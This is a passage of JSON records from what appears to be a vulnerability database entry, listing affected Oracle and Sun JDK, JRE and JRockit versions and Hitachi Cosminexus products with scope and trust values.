"eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.6" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.4" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.5" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "r28.2.8" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.4" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.0.2" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.4" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.1.3" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.5.0" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.2" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.3" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.2.5" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jdk", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jrockit", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "r27.7.6" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.5" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.7.3" }, { "model": "jre", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "505-00" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus application server standard version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer standard version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server version", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "505-00" }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus application server enterprise version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus client version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional version 06-00-/e", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer standard version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus application server enterprise version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer standard version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "505-00" }, { "model": "cosminexus studio version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus application server enterprise version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus application server enterprise version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus client version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus client version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer light version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-51" }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional version 06-50-/c", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer version 05-05-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-00" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus developer standard version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "606-02" }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer light version 06-00-/i", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-50-/f", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0.0 07", 